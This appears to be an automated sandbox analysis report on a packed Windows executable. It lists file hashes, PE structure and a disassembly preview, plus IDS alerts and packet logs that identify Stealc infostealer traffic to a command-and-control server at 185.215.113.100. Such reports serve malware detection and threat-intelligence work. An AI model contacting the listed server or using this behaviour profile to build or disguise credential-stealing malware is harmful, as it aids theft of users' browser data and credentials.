Entropy (8bit):	7.942546977390624
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'830'912 bytes
MD5:	69a44afd5f25f695f1e1fe16abf56a39
SHA1:	16db1181ec4d54a1fe2aed1f25a0bd47d53cee72
SHA256:	7f7ab62446251c1fec500e70705d6840c982351dfd8303e0ca5ddf0e40c2f6fc
SHA512:	6424e236f9e1cbbe442c99b7350d5290b828f13dfd3e333b620c843bd39d86069962b3b960124b56861ab5d6b733df3160a521817b556eeb43b0f1903c83d007
SSDEEP:	49152:Gpm+X0eqLNiWI72xmsG/rNE5R+Y8agO2UmJj:Gw7N0yxmsGDNs+Y8K2H
TLSH:	7B8533733D629A3CD5DB0D7CCE464B5A3CAB2B16401BADADDB49005C5BA7113A73E22C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa98000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66C88B4D [Fri Aug 23 13:14:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F1F18B37BAAh
bswap esi
sbb eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F1F18B39BA5h
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0B00000Ah], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23f050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x23f1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x23d000	0x13c00	a75d8ed324c58f23bb397bd007bf0e84	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23e000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x23f000	0x1000	0x200	380655991303f284fcb90ef8e49522a1	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x240000	0x2af000	0x200	a427a3e0924154632458d0533b08b19f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cwrvobrg	0x4ef000	0x1a8000	0x1a7800	41222e9219b12d1792e3be4965c82611	False	0.9947073079619244	data	7.95287821777637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
olxkocyk	0x697000	0x1000	0x600	b57b997fdd0afc5b10a0979d357e8a82	False	0.587890625	data	5.106514580872822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x698000	0x3000	0x2200	bbf49a72e759be255727e63626e8af75	False	0.06215533088235294	DOS executable (COM)	0.783854624625388	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-01T23:02:56.268443+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	49730	80	192.168.2.4	185.215.113.100
2024-09-01T23:02:55.982267+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	49730	80	192.168.2.4	185.215.113.100
2024-09-01T23:02:58.882814+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	49730	80	192.168.2.4	185.215.113.100
2024-09-01T23:02:55.988260+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	80	49730	185.215.113.100	192.168.2.4
2024-09-01T23:02:55.694309+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49730	80	192.168.2.4	185.215.113.100
2024-09-01T23:02:56.275329+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	80	49730	185.215.113.100	192.168.2.4
2024-09-01T23:02:59.442106+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49730	80	192.168.2.4	185.215.113.100

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 23:02:54.576608896 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:54.583714962 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:54.583802938 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:54.583930016 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:54.590832949 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:55.389348030 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:55.389415026 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:55.391875982 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:55.396707058 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:55.694243908 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:55.694308996 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:55.695233107 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:55.700027943 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:55.982058048 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:55.982109070 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:55.982266903 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:55.982266903 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:55.983489990 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:55.988260031 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:56.268379927 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:56.268434048 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:56.268445015 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:56.268443108 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:56.268485069 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:56.268512964 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:56.268524885 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:56.268534899 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:56.268553019 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:56.268585920 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:56.269284964 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:56.269296885 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:56.269340038 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:56.270522118 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:56.275329113 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:57.316217899 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:57.316376925 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:57.331969023 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:57.332015991 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:57.336714983 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:57.336817026 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:57.336849928 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:57.336865902 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:57.337002039 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:57.337011099 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:58.882740021 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:58.882813931 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.155009985 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.159812927 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.442027092 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.442042112 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.442106009 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.442140102 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.442193985 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.442204952 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.442212105 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.442230940 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.442234039 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.442256927 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.442991018 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.443011999 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.443021059 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.443023920 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.443042994 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.443078041 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.525824070 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.525834084 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.525903940 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.649599075 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.649617910 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.649627924 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.649671078 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.649698973 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.649835110 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.649883986 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.649899960 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.649909019 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.649939060 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.649950981 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.650350094 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.650393963 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.650404930 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.650408030 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.650433064 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.650443077 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.687701941 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.687719107 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.687827110 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.687834978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.687854052 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.687855005 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.687884092 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.687884092 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.849373102 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.849385023 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.849467993 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.849484921 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.849502087 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.849688053 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.849688053 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.849711895 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.849729061 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.849769115 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.849781036 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.850096941 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.850109100 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.850120068 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.850131035 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:02:59.850145102 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:02:59.850187063 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.248903990 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.248928070 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.249070883 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.249070883 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.331468105 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.331525087 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.331650019 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.331650019 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.448050976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.448061943 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.448071957 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.448103905 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.448250055 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.448250055 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.448322058 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.448369026 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.448370934 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.448379993 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.448419094 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.652517080 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.652529001 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.652570963 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.652575970 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.652616024 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.652620077 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.652661085 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.655102015 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.655112028 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.655185938 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.655189991 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.655227900 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.655245066 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.655255079 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.655302048 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.844213963 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.844223976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.844295979 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.845496893 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.845558882 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.845572948 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.845583916 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.845613003 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.845626116 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.845700026 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.845748901 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.845760107 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.845772982 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.845808983 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:00.845813036 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:00.845850945 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.043200970 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.043219090 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.043298960 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.043519020 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.043556929 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.043572903 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.043751001 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.303809881 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.303829908 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.303993940 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.461384058 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.461431026 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.461504936 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.461574078 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.461574078 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.461574078 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.461601019 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.461612940 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.461643934 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.461656094 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.461673975 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.461688995 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.461715937 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.461745977 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.462508917 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.462560892 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.544181108 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.544394970 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.865370035 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.865382910 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.865392923 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.865468979 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.865515947 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.865525961 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.865536928 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.865549088 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.865561008 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.865641117 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.865641117 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.865641117 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.865641117 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.865641117 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.865641117 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:01.865653992 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:01.865690947 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.147804976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.147816896 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.147829056 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.147861004 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.147870064 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.148039103 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.148039103 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.476150036 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.476161003 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.476171017 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.476224899 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.476259947 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.476264000 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.476274967 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.476288080 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.476299047 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.476313114 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.476351023 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.476968050 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.476991892 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.477003098 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.477008104 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.477032900 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.477046013 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.477125883 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.477139950 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:02.477161884 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.477173090 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:02.685180902 CEST	80	49730	185.215.113.100	192.168.2.4
